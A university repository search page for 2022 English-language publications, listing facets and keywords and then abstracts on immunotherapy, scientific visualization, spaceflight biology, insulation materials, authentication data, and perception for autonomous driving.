Refine
Departments, institutes and facilities
- Fachbereich Informatik (62)
- Fachbereich Angewandte Naturwissenschaften (53)
- Institut für Technik, Ressourcenschonung und Energieeffizienz (TREE) (47)
- Fachbereich Wirtschaftswissenschaften (43)
- Fachbereich Ingenieurwissenschaften und Kommunikation (33)
- Internationales Zentrum für Nachhaltige Entwicklung (IZNE) (21)
- Institut für funktionale Gen-Analytik (IFGA) (15)
- Institut für Verbraucherinformatik (IVI) (14)
- Institute of Visual Computing (IVC) (13)
- Institut für Cyber Security & Privacy (ICSP) (10)
- Institut für Sicherheitsforschung (ISF) (7)
- Fachbereich Sozialpolitik und Soziale Sicherung (5)
- Graduierteninstitut (5)
- Zentrum für Innovation und Entwicklung in der Lehre (ZIEL) (5)
- Centrum für Entrepreneurship, Innovation und Mittelstand (CENTIM) (4)
- Institut für Detektionstechnologien (IDT) (1)
- Sprachenzentrum (1)
Document Type
- Article (110)
- Conference Object (53)
- Part of a Book (16)
- Preprint (12)
- Research Data (6)
- Doctoral Thesis (5)
- Master's Thesis (5)
- Report (4)
- Book (monograph, edited volume) (2)
- Conference Proceedings (2)
Year of publication
- 2022 (219) (remove)
Language
- English (219) (remove)
Keywords
- Machine Learning (5)
- virtual reality (4)
- Cathepsin K (3)
- GDPR (3)
- Knowledge Graphs (3)
- Lignin (3)
- usable privacy (3)
- 3D user interface (2)
- Bioinformatics (2)
- Chemometrics (2)
- Computer Vision (2)
- Control Systems and Automation (2)
- Deep Learning (2)
- Electrical Machines and Power Electronics (2)
- Enhanced weathering (2)
- HTS (2)
- Hydrogen storage (2)
- Intelligent controls (2)
- Natural Language Processing (2)
- Renewable Energy Systems (2)
- Rock dust (2)
- SERS (2)
- Security (2)
- Soil health (2)
- Sustainability (2)
- Transformers (2)
- Well-being (2)
- azadipeptide nitrile (2)
- biodiversity (2)
- creep (2)
- cyanohydrazide warhead (2)
- cytokine-induced killer cells (2)
- embedded systems (2)
- haptics (2)
- immunotherapy (2)
- interaction design (2)
- modeling (2)
- presenteeism (2)
- protease inhibitor (2)
- prototyping (2)
- relaxation (2)
- social robots (2)
- structure (2)
- sustainable development goals (2)
- synchronous generator (2)
- 1H (1)
- 3-hydroxyisobutyrate dehydrogenase (1)
- 3-hydroxyisobutyric acid dehydrogenase deficiency (1)
- 3-hydroxyisobutyric aciduria (1)
- 3D Segmentation (1)
- ADA2 (1)
- AI usage in sports (1)
- ANSYS (1)
- AOP (1)
- APC superfamily (1)
- ASR (1)
- ATB0,+ (1)
- Abstract Syntax Tree (1)
- Adaptive mesh refinement (1)
- Additiv (1)
- Adoption Factors (1)
- Adsorption (1)
- Aerogel (1)
- Aerosol (1)
- Agri-environment schemes (1)
- Air Pollution Monitoring (1)
- Alzheimer’s disease (1)
- Ammoniak (1)
- Anthropocene (1)
- Antimicrobial activity (1)
- Antioxidans (1)
- Antioxidant activity (1)
- Antiresorptive (1)
- Applications in Energy Transport (1)
- Artificial Intelligence (1)
- Artificial Intelligence (cs.AI) (1)
- AuNPs (1)
- Augmented Lagrangian (1)
- Augmented Reality (1)
- Autism Spectrum Disorder (1)
- Autonomous Driving (1)
- Autonomy (1)
- BCFA (1)
- BDF methods (1)
- Bachelor’s program (1)
- Backorder prediction (1)
- Ballastless track (1)
- Bayesian CFA (1)
- Beacon Chain (1)
- Benzoyl-coenzym A (1)
- Bibliographic Analysis (1)
- Biochemicals (1)
- Bioenergy (1)
- Biomass (1)
- Biometric data (1)
- Biopolymers (1)
- Biosignatures (1)
- Bisphosphonates (1)
- Board (1)
- Bodengesundheit (1)
- Bounding box explanations (1)
- Brand (1)
- Brand identity (1)
- Brand image (1)
- Business Incubation Center (1)
- Business statistics (1)
- CD40, CTLA-4 (1)
- CNN (1)
- COVID-19 (1)
- COVID‐19 (1)
- Capital structure (1)
- Cellulose (1)
- Charakterisierung (1)
- Christmas trees (1)
- Cislunar (1)
- Classification explanations (1)
- Cloud computing (1)
- Coaching process (1)
- Codes (1)
- Collective action (1)
- Complementarity Problem (1)
- Complex Systems Modeling and Simulation (1)
- Complexity (1)
- Composites (1)
- Confidence intervals (1)
- Conformation (1)
- Constrained mechanical system (1)
- Contingency analysis (1)
- Corporate Social Responsibility (1)
- Crystal structure (1)
- Cucumber peel waste (1)
- Current research information systems (1)
- Cypher (1)
- DADA2 (1)
- DMA (1)
- DNA damage (1)
- DNA typing (1)
- DSC (1)
- Data Generation (1)
- Data literacy (1)
- Data protection by design (1)
- Data structures (1)
- Descriptive statistics (1)
- Differential Variational Inequality (1)
- Digital Energy Management (1)
- Digital Entrepreneurship Education (1)
- Digital Plumbing (1)
- Distance Perception (1)
- Düngemittel (1)
- Effective purpose specification (1)
- Electric circuit analysis (1)
- Employee Privacy (1)
- Entrepreneurial Intention (1)
- Entrepreneurial family (1)
- Entrepreneurial self-efficacy (1)
- Environment Perception (1)
- Ethereum (1)
- ExoMars (1)
- Experiment (1)
- Explainable Artificial Intelligence (XAI) (1)
- Explosives (1)
- Extrusionsblasformen (1)
- FOS: Computer and information sciences (1)
- Family business (1)
- Feedback (1)
- Fertilizer (1)
- Food security (1)
- Forklifts (1)
- GFRP (1)
- Gas transport simulation (1)
- Gasturbinenschaufel (1)
- Geometry (1)
- Georgien (1)
- Gesteinsmehl (1)
- Global explanati (1)
- Glutamin N-phenylacetyltransferase (1)
- Glycin N-acyltransferase (1)
- Glycine N-acyltransferase (1)
- Glycine conjugation (1)
- Glycogen storage disease type (1)
- Glyzinkonjugation (1)
- Gradient-based explanation methods (1)
- Graph Convolutional Neural Networks (1)
- Graph embeddings (1)
- Graph theory (1)
- Graphene (1)
- Gülle (1)
- HCI (1)
- HDBR (1)
- HIBADH (1)
- HIBADH deficiency (1)
- HS SPME–GC/MS (1)
- HSP90 (1)
- Hardware (1)
- Harnstoffzyklusdefekt (1)
- Health Promotion (1)
- Health care consumption (1)
- Health insurance (1)
- Hematopoietic stem cells (1)
- Hemp (1)
- High-speed track (1)
- Higher Education (1)
- Highly Automated Driving (1)
- Historical remarks (1)
- Human orientation perception (1)
- Human-Centered Design (1)
- Human-Food-Interaction (1)
- Human-robot interaction (1)
- Hydrogen (1)
- IR microspectroscopy (1)
- IaaS (1)
- Image representation (1)
- Inclusion (1)
- Index notions (1)
- Inductive statistics (1)
- Information Privacy (1)
- Institutional Analysis and Development (IAD) framework (1)
- Institutions of Sustainability (IoS) framework (1)
- Intelligent Process Automation (1)
- Interaction (1)
- Interaction effects (1)
- Interdisciplinarity (1)
- Interdisciplinary education (1)
- Interests (1)
- International sustainable development (1)
- Invisible AI (1)
- IoT (1)
- Isotherms (1)
- Isovalerianazidämie (1)
- Isovaleric acidemia (1)
- Job satisfaction (1)
- Ketogenic diet (1)
- Ketone body (1)
- Kinetics (1)
- Knowledge co-production (1)
- Kriechen (1)
- LSTM (1)
- Laboratory (1)
- Lebensdauervorhersage (1)
- LeuT (1)
- Ligands (1)
- Lignin-based composites (1)
- Linear viscoelasticity (1)
- Lineare Viskoelastizität (1)
- LoRa (1)
- LoRaWAN (1)
- Local explanation (1)
- Low-input crops (1)
- MAXQDA (1)
- MOX gas sensors (1)
- Machine Learning (cs.LG) (1)
- Malware (1)
- Marketplaces (1)
- Markov Cluster Algorithm (1)
- Markov chain Monte Carlo (1)
- Mars (1)
- Mass transport (1)
- Mathematical methods (1)
- Measure differential Inclusion (1)
- Mechanische Prüfung (1)
- Membrane Transport (1)
- Mesenchymal stem cells (1)
- Metabolic decompensation (1)
- Metal hydride storage (1)
- Microgravity (1)
- Miscanthus (1)
- Molecular dynamics (1)
- Molecular structure (1)
- Monocarboxylate transporter 1 (1)
- Moreau–Jean time stepping (1)
- Multi-object visualization (1)
- Multidisciplinary (1)
- NLP (1)
- NMR (1)
- NSS family (1)
- Nadelhölzer (1)
- Nafion™ (1)
- Nano-Systems (1)
- Nanoparticles (1)
- Negotiation of Taste (1)
- Neural Machine Translation (1)
- Neural representations (1)
- New study course (1)
- Nickel-based superalloy (1)
- Nickelbasis-Superlegierung (1)
- Noise reduction (1)
- Non-linear systems (1)
- O3/UV (1)
- OCT (1)
- Object Segmentation (1)
- Object detectors (1)
- One Health doctoral training (1)
- One Health implementation (1)
- Open Access (1)
- Orion (1)
- Osteoanabolic (1)
- Osteoporosis (1)
- PAD (1)
- PEM electrolysis (1)
- PLASM (1)
- PLS-regression (1)
- PV model (1)
- PaaS (1)
- Packaging (1)
- Pakistan (1)
- Parametric study (1)
- Part Segmentation (1)
- Partial differential-algebraic equations (1)
- Payment for Ecosystem Services (PES) (1)
- Perception (1)
- Perceptual Upright (1)
- Peren-Clement Index (PCI) (1)
- Performance (1)
- Permeation (1)
- Phase II Reaktion (1)
- Phenylacetyl-coenzym A (1)
- Photovoltaic cell (1)
- Point Cloud Segmentation (1)
- Policy instruments (1)
- Polymers (1)
- Polysaccharide derivatives (1)
- Positive emotions (1)
- Poverty (1)
- Power (1)
- Private equity (1)
- Probability calculation (1)
- Process phases (1)
- Program evaluation (1)
- Proof of Stake (1)
- Proximity (1)
- Py-EGA-MS (1)
- Py-GC/MS (1)
- Py-MS (1)
- Quantitative analysis of explanations (1)
- R-ratio (1)
- Raman spectroscopy (1)
- Raman-microspectroscopy (1)
- Ray tracing (1)
- Regenerative medicine (1)
- Research-practice-collaborations (1)
- Ressource (1)
- RheoTack analysis (1)
- Right to Informational Self-Determination (1)
- Robot-Assisted Therapy (1)
- Robotic Process Automation (1)
- Rosskastanie (1)
- Runge-Kutta methods (1)
- Röpke (1)
- Rüstow (1)
- SDG 3 (1)
- SDG 4 (1)
- SLC (1)
- SLC6 (1)
- SLC6A14 (1)
- SMPA loop (1)
- SQL (1)
- STARLIFE project (1)
- SaaS (1)
- Safety (1)
- Saliency maps (1)
- Sanity checks for explaining detectors (1)
- Scalability (1)
- Schneeglöckchen (1)
- Schwindung (1)
- Science Management (1)
- Self-assembling (1)
- Self-supervised learning (1)
- Semantic Segmentation (1)
- Semantic search (1)
- Service-based cloud computing (1)
- Silicon Carbides (1)
- Simulations (1)
- Simulator (1)
- Simulator sickness (1)
- Single family office (1)
- Social Protection (1)
- Social protection (1)
- Socio Informatics (1)
- Software Supply Chain (1)
- Sonar (1)
- Soziale Sicherheit (1)
- Sozialpolitik (1)
- Space radiation (1)
- Spectral effects (1)
- Spill-over (1)
- Stabilisator (1)
- Stabilization (1)
- Statistical estimation methods (1)
- Statistical signs and symbols (1)
- Statistical testing methods (1)
- Statistics for economics (1)
- Statistics formulary (1)
- Supervised learning (1)
- Sustainable development (1)
- Sustainable engineering (1)
- Synergie (1)
- TD-GC/MS (1)
- TGA-FTIR (1)
- TGA-MS (1)
- TLS (1)
- TOC (1)
- Tap water (1)
- Taste (1)
- Thermochemical conversion (1)
- Thermodynamics (1)
- Three-dimensional displays (1)
- Thyme (1)
- Thymian (1)
- TiO2-coatings (1)
- Topological reduction (1)
- Topology (1)
- Transdisciplinary research (1)
- Transfer learning (1)
- Transformation Management (1)
- Treatment (1)
- UV (1)
- UXD (1)
- Underwater (1)
- Unilateral Constraints (1)
- Universal health care (1)
- University students (1)
- Urinary organic acids (1)
- Usable Security (1)
- User Experience (1)
- User-Centered Design (1)
- VOCs (1)
- VOSviewer (1)
- Verbal and non-verbal communication (1)
- Verification systems (1)
- Verzug (1)
- Video analysis (1)
- Visually induced motion sickness (1)
- Voight-Kampff test (1)
- Voltage measurement (1)
- Web scrapping (1)
- Weihnachtsbaum (1)
- West Africa (1)
- Winery (1)
- Wizard of Oz (1)
- Working relationship (1)
- Workload (1)
- Work‐life balance (1)
- X-ray (1)
- Yeast (1)
- ability to study (1)
- acceptance (1)
- adaptive trigger (1)
- additive (1)
- adhesion factor (1)
- advanced applications (1)
- aircraft engine part (1)
- aluminum bonding wire (1)
- ambientes restauradores (1)
- ambiguity (1)
- amino acid transporter (1)
- ammonia (1)
- anabolic (1)
- anaplastic lymphoma kinase (1)
- annotation (1)
- anti-TNF (1)
- antibiotic prophylaxis (1)
- antioxidant (1)
- análisis factoriales confirmatorios (1)
- appropriation (1)
- armature winding (1)
- attention restoration (1)
- attitude-behavior gap for sustainability (1)
- augmented reality (1)
- authentication (1)
- authoring (1)
- autologous bone graft (1)
- automatic measurement validation (1)
- automatic music generation (1)
- automotive lever (1)
- autonomous explanation generation (1)
- autonomy (1)
- bacteria (1)
- benchtop (1)
- benzoyl-coA (1)
- beschleunigte Verwitterung (1)
- biaxial stretching (1)
- bio-based (1)
- bio-chemicals (1)
- biobasiert (1)
- biochemical fingerprinting (1)
- bioenergy (1)
- biomarker (1)
- biomaterial (1)
- biometrics (1)
- blockchain (1)
- blown film extrusion (1)
- bone mineral density (1)
- bone remodeling (1)
- cabbage waste (1)
- cafeteria (1)
- capability approach (1)
- cardiac magnetic resonance (1)
- catabolic (1)
- cell viability (1)
- chain-extending cross-linker (1)
- characterization (1)
- chemosensing (1)
- cholesteric phase (1)
- chromanones (1)
- circular economy (1)
- classification (1)
- clinical trials (1)
- co-design (1)
- coffee ring effect (1)
- collision (1)
- combination of treatments (1)
- complex problems (1)
- composite materials (1)
- computational geometry (1)
- confirmatory factor analyses (1)
- coniferous woods (1)
- consumer behavior for sustainability (1)
- controller design (1)
- creep compliance (1)
- crystallization (1)
- cube in cube model (1)
- current limiting (1)
- cybersickness (1)
- decision support system (1)
- deformation behavior (1)
- dental implant (1)
- detaching (1)
- didactical method mix (1)
- differential-algebraic equations (1)
- digital co-creation (1)
- digital learning (1)
- discriminant analysis (1)
- double pulse test (1)
- drivers (1)
- drug delivery (1)
- eXplainable artifcial intelligence (XAI) (1)
- eco-certification (1)
- eco-products (1)
- ecosystem services (1)
- education for sustainable development (1)
- educational psychology (1)
- elementary volume (1)
- elite athletes (1)
- elite sports (1)
- emotion recognition (1)
- employability (1)
- employee privacy (1)
- engaged university (1)
- engineering plastics (1)
- entrepreneurial intention (1)
- environmental certification (1)
- error analysis (1)
- eudaimonic well-being (1)
- explainability (1)
- explainable AI (1)
- extremophile (1)
- extrusion blow molding (1)
- facial emotion recognition (1)
- factor analysis (1)
- failure analysis (1)
- farmers (1)
- fault ride through (1)
- feature (1)
- feature selection (1)
- fertilizer (1)
- fiber composites (1)
- fingerprint (1)
- five-factor model (1)
- flexibility (1)
- flying (1)
- forensic genetics (1)
- freedom (1)
- fuel cell (1)
- fully superconducting (1)
- fully superconducting generator (1)
- gas transport networks (1)
- gas turbine blade (1)
- gas-to-power (1)
- generation Z (1)
- generational cohort (1)
- geopolymer (1)
- glass fibers (1)
- glutamine N-phenylacetyltransferase (1)
- green conservatism (1)
- grid-forming converter (1)
- guidance (1)
- halogen bonding (1)
- head down bed rest (1)
- health (1)
- health intervention (1)
- health management (1)
- health-promoting collaboration (1)
- healthy eating (1)
- hexahedron (1)
- high-order meshes (1)
- holiday (1)
- horse chestnut (1)
- human cholinesterases (1)
- human-centred design (1)
- human-robot interaction (HRI) (1)
- hybrid system (1)
- hydrides (1)
- hydrogen (1)
- hydrogen bonding (1)
- immune checkpoint inhibition programmed cell death-1 (1)
- impact monitoring (1)
- institutional analysis (1)
- integrative Simulation (1)
- integrative simulation (1)
- interaction architecture (1)
- interface design (1)
- intervention mechanisms (1)
- knowledge transfer (1)
- land use (1)
- language (1)
- latent class analysis (1)
- leave (1)
- leishmaniasis (1)
- life-detection (1)
- lifetime prediction (1)
- local chain orientation (1)
- low-cost air sensor (1)
- macrophages. (1)
- mass society (1)
- mathematical and numerical algorithms and methods (1)
- measurement errors (1)
- mechanical testing (1)
- memories (1)
- mesenchymal stem cells (1)
- mesh generation (1)
- mesoscale coarse-graining (1)
- methylmalonic acidemia (1)
- microbial contamination (1)
- migration (1)
- mixed methods (1)
- mixed methods study (1)
- mixed reality (1)
- mobility intelligence (1)
- molecular docking (1)
- molecular weight determination (1)
- monoamine oxidases (1)
- motion sickness (1)
- multineurotarget agents (1)
- multisensory cues (1)
- multivariate statistics (1)
- music analysis (1)
- nachhaltig (1)
- nanomedicine (1)
- nature (1)
- nature-protected areas (1)
- neutral buoyancy (1)
- non-small cell lung cancer (1)
- nostalgia (1)
- nucleic acids (1)
- nudge (1)
- nudgeability (1)
- off-job crafting (1)
- optic flow (1)
- optical coherence tomography (1)
- oral history (1)
- organizational policy (1)
- organosolv (1)
- orthotropes prozessabhängiges Materialverhalten (1)
- orthotropic process-dependent material behavior (1)
- osteoblast (1)
- osteoclast (1)
- osteogenic potential (1)
- osteoporosis (1)
- ozonation (1)
- ozone (1)
- particulate composite (1)
- path tracing (1)
- pathophysiology (1)
- peer-assisted learning (1)
- personality traits (1)
- personalized behaviour model (1)
- phase II reaction (1)
- phase angle jump (1)
- phenylacetyl-coA (1)
- photonic sensing (1)
- physical exercise (1)
- pigments (1)
- poly(butylene adipate terephthalate) (1)
- poly(lactic acid) (1)
- polyethylene (1)
- power converter (1)
- power electronics (1)
- power semiconductors (1)
- presentation attack detection (1)
- pressure sensitive adhesives (1)
- prioritizable ranking (1)
- privacy by design (1)
- process-induced morphology (1)
- professors as mentors (1)
- propionic acidemia (1)
- protein microarray (1)
- psicometría (1)
- psychometrics (1)
- psychophysics (1)
- qualitative research (1)
- questionnaire (1)
- rate of change of frequency (1)
- reCAPTCHA (1)
- real-time (1)
- recovery (1)
- remembering (1)
- renal cell carcinoma (1)
- representation learning (1)
- ressources (1)
- restauración de la atención (1)
- restorative environments (1)
- retraction speed dependency (1)
- right to access (1)
- rock powder (1)
- rubbers (1)
- scaffolds (1)
- security and privacy literacy (1)
- self-determination theory (1)
- self-motion perception (1)
- sensor array (1)
- sensor phenomena and characterization (1)
- sensory characterisation (1)
- sentiment analysis (1)
- shared mobility (1)
- short tandem repeat (STR) (1)
- shrinkage (1)
- simulation and modeling (1)
- situation awareness (1)
- slope based signature (1)
- slurry (1)
- small-scale fatigue testing (1)
- snowdrop (1)
- social Innovation (1)
- social activities (1)
- social exchange theory (1)
- social media (1)
- social order (1)
- socially engaged university (1)
- socio-interactive explanation generation (1)
- solute carrier (1)
- space flight analog (1)
- space radiation environment (1)
- speech emotion recognition (1)
- stakeholder analysis (1)
- storytelling (1)
- stress response (1)
- structural equation modeling (1)
- structural policy (1)
- student activating approaches (1)
- students (1)
- subjective visual vertical (1)
- superconductor (1)
- supramolecular liquid crystals (1)
- surrogate endpoint (1)
- susceptibility (1)
- sustainability-oriented behavior (1)
- sustainable (1)
- sustainable mobility (1)
- synergism (1)
- systemic approach (1)
- systemic regional innovation (1)
- technological innovation (1)
- thermal comfort modelling (1)
- thermal insulation materials (1)
- thermochemical conversion (1)
- thermophoresis (1)
- thermosensing (1)
- third mission (1)
- time series analysis (1)
- tissue engineering (1)
- traffic surveillance (1)
- transfer office (1)
- transparency (1)
- transparency-enhancing technologies (1)
- travel techniques (1)
- triiodothyronine (1)
- triple helix (1)
- ultrapure water (1)
- university–government relations (1)
- urban development (1)
- urea cycle defect (1)
- usability (1)
- user journey (1)
- user study (1)
- user-centered explanation generation (1)
- valine catabolic pathway (1)
- vection (1)
- vibration (1)
- view management (1)
- virtual reality, XR (1)
- vital policy (1)
- warpage (1)
- weight perception (1)
- welfare state (1)
- whole genome amplification (WGA) (1)
- wide band gap (1)
- wind energy (1)
- work ability (1)
- σ1 and σ2 receptors (1)
- DRAMMA model (1)
- integrative needs model of crafting (1)
- leisure crafting (1)
- needs satisfaction (1)
- needs-based (1)
- optimal functioning (1)
- validation (1)
Cytokine-induced killer cells (CIK) in combination with dendritic cells (DCs) have shown favorable outcomes in renal cell carcinoma (RCC), yet some patients exhibit recurrence or no response to this therapy. In a broader perspective, enhancing the antitumor response of DC-CIK cells may help to address this issue. Considering this, herein, we investigated the effect of anti-CD40 and anti-CTLA-4 antibodies on the antitumor response of DC-CIK cells against RCC cell lines. Our analysis showed that, a) anti-CD40 antibody (G28.5) increased the CD3+CD56+ effector cells of CIK cells by promoting the maturation and activation of DCs, b) G28.5 also increased CTLA-4 expression in CIK cells via DCs, but the increase could be hindered by the CTLA-4 inhibitor (ipilimumab), c) adding ipilimumab was also able to significantly increase the proportion of CD3+CD56+ cells in DC-CIK cells, d) anti-CD40 antibodies predominated over anti-CTLA-4 antibodies for cytotoxicity, apoptotic effect and IFN-g secretion of DC-CIK cells against RCC cells, e) after ipilimumab treatment, the population of Tregs in CIK cells remained unaffected, but ipilimumab combined with G28.5 significantly reduced the expression of CD28 in CIK cells. Taken together, we suggest that the agonistic anti-CD40 antibody rather than CTLA-4 inhibitor may improve the antitumor response of DC-CIK cells, particularly in RCC. In addition, we pointed towards the yet to be known contribution of CD28 in the crosstalk between anti-CTLA-4 and CIK cells.
We describe a systematic approach for rendering time-varying simulation data produced by exa-scale simulations, using GPU workstations. The data sets we focus on use adaptive mesh refinement (AMR) to overcome memory bandwidth limitations by representing interesting regions in space with high detail. Particularly, our focus is on data sets where the AMR hierarchy is fixed and does not change over time. Our study is motivated by the NASA Exajet, a large computational fluid dynamics simulation of a civilian cargo aircraft that consists of 423 simulation time steps, each storing 2.5 GB of data per scalar field, amounting to a total of 4 TB. We present strategies for rendering this time series data set with smooth animation and at interactive rates using current generation GPUs. We start with an unoptimized baseline and step by step extend that to support fast streaming updates. Our approach demonstrates how to push current visualization workstations and modern visualization APIs to their limits to achieve interactive visualization of exa-scale time series data sets.
Modern GPUs come with dedicated hardware to perform ray/triangle intersections and bounding volume hierarchy (BVH) traversal. While the primary use case for this hardware is photorealistic 3D computer graphics, with careful algorithm design scientists can also use this special-purpose hardware to accelerate general-purpose computations such as point containment queries. This article explains the principles behind these techniques and their application to vector field visualization of large simulation data using particle tracing.
When the Artemis missions launch, NASA's Orion spacecraft (and crew as of the Artemis II mission) will be exposed to the deep space radiation environment beyond the protection of Earth's magnetosphere. Hence, it is essential to characterize the effects of space radiation, microgravity, and the combination thereof on cells and organisms, i.e., to quantify any correlations between the deep space radiation environment, genetic variation, and induced genetic changes in cells. To address this, the Artemis I mission will include the Peristaltic Laboratory for Automated Science with Multigenerations (PLASM) hardware containing the Deep Space Radiation Genomics (DSRG) experiment. The scientific aims of DSRG are (i) to identify the metabolic and genomic pathways in yeast affected by microgravity, space radiation, and their combination, and (ii) to differentiate between gravity and radiation exposure on single-gene deletion/overexpressing strains' ability to thrive in the spaceflight environment. Yeast is used as a model system because 70% of its essential genes have a human homolog, and over half of these homologs can functionally replace their human counterpart. As part of the experiment preparation towards spaceflight, an Experiment Verification Test (EVT) was performed at the Kennedy Space Center to verify that the experiment design, hardware, and approach to automated operations will enable achieving the scientific aims. For the EVT, fluidic systems were assembled, sterilized, loaded, and acceptance-tested, and subsequently integrated with the engineering parts to produce a flight-like PLASM unit. Each fluidic system consisted of (i) a Media Bag, (ii) four Culture Bags loaded with Saccharomyces cerevisiae (two with deletion series and the remaining two with overexpression series), and (iii) tubing and check valves. The EVT PLASM unit was put under a temperature profile replicating the anticipated different phases of flight, including handover to launch, spaceflight, and splashdown to handover back to the science team, for a 58-day period. At EVT completion, the rate of activation, cellular growth, RNA integrity, and sample contamination were interrogated. All of the experiment's success criteria were satisfied, encouraging our efforts to perform this investigation on Artemis I. This manuscript thus describes the process of spaceflight experiment design maturation with a focus on the EVT, its results, DSRG's preparation for its planned launch on Artemis I in 2022, and how the PLASM hardware can enable other scientific goals on future Artemis missions and/or the Lunar Orbital Platform – Gateway.
Intention: Within the research project EnerSHelF (Energy-Self-Sufficiency for Health Facilities in Ghana), i. a. energy-meteorological and load-related measurement data are collected, for which an overview of the availability is to be presented on a poster.
Context: In Ghana, the total electricity consumed has almost doubled between 2008 and 2018 according to the Energy Commission of Ghana. This goes along with an unstable power grid, resulting in power outages whenever electricity consumption peaks. The blackouts called "dumsor" in Ghana, pose a severe burden to the healthcare sector. Innovative solutions are needed to reduce greenhouse gas emissions and improve energy and health access.
Approximately 45% of global greenhouse gas emissions are caused by the construction and use of buildings. Thermal insulation of buildings in the current context of climate change is a well-known strategy to improve the energy efficiency of buildings. The development of renewable insulation material can overcome the drawbacks of widely used insulation systems based on polystyrene or mineral wool. This study analyzes the sustainability and thermal conductivity of new insulation materials made of Miscanthus x giganteus fibers, foaming agents, and alkali-activated fly ash binder. Life cycle assessments (LCA) are necessary to perform benchmarking of environmental impacts of new formulations of geopolymer-based insulation materials. The global warming potential (GWP) of the product is primarily determined by the main binder component sodium silicate. Sodium silicate's CO2 emissions depend on local production, transportation, and energy consumption. The results, which have been published during recent years, vary in a wide range from 0.3 kg to 3.3 kg CO2-eq. kg-1. The overall GWP of the insulation system based on Miscanthus fibers, with properties according to current thermal insulation regulations, reaches up to 95% savings of CO2 emissions compared to conventional systems. Carbon neutrality can be achieved through formulations containing raw materials with carbon dioxide emissions and renewable materials with negative GWP, thus balancing CO2 emissions.
Login Data Set for Risk-Based Authentication
Synthesized login feature data of >33M login attempts and >3.3M users on a large-scale online service in Norway. Original data collected between February 2020 and February 2021.
This data sets aims to foster research and development for <a href="https://riskbasedauthentication.org">Risk-Based Authentication (RBA) systems. The data was synthesized from the real-world login behavior of more than 3.3M users at a large-scale single sign-on (SSO) online service in Norway.
Guzzo et al. (Reference Guzzo, Schneider and Nalbantian2022) argue that open science practices may marginalize inductive and abductive research and preclude leveraging big data for scientific research. We share their assessment that the hypothetico-deductive paradigm has limitations (see also Staw, Reference Staw2016) and that big data provide grand opportunities (see also Oswald et al., Reference Oswald, Behrend, Putka and Sinar2020). However, we arrive at very different conclusions. Rather than opposing open science practices that build on a hypothetico-deductive paradigm, we should take initiative to do open science in a way compatible with the very nature of our discipline, namely by incorporating ambiguity and inductive decision-making. In this commentary, we (a) argue that inductive elements are necessary for research in naturalistic field settings across different stages of the research process, (b) discuss some misconceptions of open science practices that hide or discourage inductive elements, and (c) propose that field researchers can take ownership of open science in a way that embraces ambiguity and induction. We use an example research study to illustrate our points.
Fatigue strength estimation is a costly manual material characterization process in which state-of-the-art approaches follow a standardized experiment and analysis procedure. In this paper, we examine a modular, Machine Learning-based approach for fatigue strength estimation that is likely to reduce the number of experiments and, thus, the overall experimental costs. Despite its high potential, deployment of a new approach in a real-life lab requires more than the theoretical definition and simulation. Therefore, we study the robustness of the approach against misspecification of the prior and discretization of the specified loads. We identify its applicability and its advantageous behavior over the state-of-the-art methods, potentially reducing the number of costly experiments.
Comparative study of 3D object detection frameworks based on LiDAR data and sensor fusion techniques
(2022)
Estimating and understanding the surroundings of the vehicle precisely forms the basic and crucial step for the autonomous vehicle. The perception system plays a significant role in providing an accurate interpretation of a vehicle's environment in real-time. Generally, the perception system involves various subsystems such as localization, obstacle (static and dynamic) detection, and avoidance, mapping systems, and others. For perceiving the environment, these vehicles will be equipped with various exteroceptive (both passive and active) sensors in particular cameras, Radars, LiDARs, and others. These systems are equipped with deep learning techniques that transform the huge amount of data from the sensors into semantic information on which the object detection and localization tasks are performed. For numerous driving tasks, to provide accurate results, the location and depth information of a particular object is necessary. 3D object detection methods, by utilizing the additional pose data from the sensors such as LiDARs, stereo cameras, provides information on the size and location of the object. Based on recent research, 3D object detection frameworks performing object detection and localization on LiDAR data and sensor fusion techniques show significant improvement in their performance. In this work, a comparative study of the effect of using LiDAR data for object detection frameworks and the performance improvement seen by using sensor fusion techniques are performed. Along with discussing various state-of-the-art methods in both the cases, performing experimental analysis, and providing future research directions.
Comparative study of 3D object detection frameworks based on LiDAR data and sensor fusion techniques
(2022)
Estimating and understanding the surroundings of the vehicle precisely forms the basic and crucial step for the autonomous vehicle. The perception system plays a significant role in providing an accurate interpretation of a vehicle's environment in real-time. Generally, the perception system involves various subsystems such as localization, obstacle (static and dynamic) detection, and avoidance, mapping systems, and others. For perceiving the environment, these vehicles will be equipped with various exteroceptive (both passive and active) sensors in particular cameras, Radars, LiDARs, and others. These systems are equipped with deep learning techniques that transform the huge amount of data from the sensors into semantic information on which the object detection and localization tasks are performed. For numerous driving tasks, to provide accurate results, the location and depth information of a particular object is necessary. 3D object detection methods, by utilizing the additional pose data from the sensors such as LiDARs, stereo cameras, provides information on the size and location of the object. Based on recent research, 3D object detection frameworks performing object detection and localization on LiDAR data and sensor fusion techniques show significant improvement in their performance. In this work, a comparative study of the effect of using LiDAR data for object detection frameworks and the performance improvement seen by using sensor fusion techniques are performed. Along with discussing various state-of-the-art methods in both the cases, performing experimental analysis, and providing future research directions.
We introduce canonical weight normalization for convolutional neural networks. Inspired by the canonical tensor decomposition, we express the weight tensors in so-called canonical networks as scaled sums of outer vector products. In particular, we train network weights in the decomposed form, where scale weights are optimized separately for each mode. Additionally, similarly to weight normalization, we include a global scaling parameter. We study the initialization of the canonical form by running the power method and by drawing randomly from Gaussian or uniform distributions. Our results indicate that we can replace the power method with cheaper initializations drawn from standard distributions. The canonical re-parametrization leads to competitive normalization performance on the MNIST, CIFAR10, and SVHN data sets. Moreover, the formulation simplifies network compression. Once training has converged, the canonical form allows convenient model-compression by truncating the parameter sums.
Safety-critical applications like autonomous driving use Deep Neural Networks (DNNs) for object detection and segmentation. The DNNs fail to predict when they observe an Out-of-Distribution (OOD) input leading to catastrophic consequences. Existing OOD detection methods were extensively studied for image inputs but have not been explored much for LiDAR inputs. So in this study, we proposed two datasets for benchmarking OOD detection in 3D semantic segmentation. We used Maximum Softmax Probability and Entropy scores generated using Deep Ensembles and Flipout versions of RandLA-Net as OOD scores. We observed that Deep Ensembles out perform Flipout model in OOD detection with greater AUROC scores for both datasets.
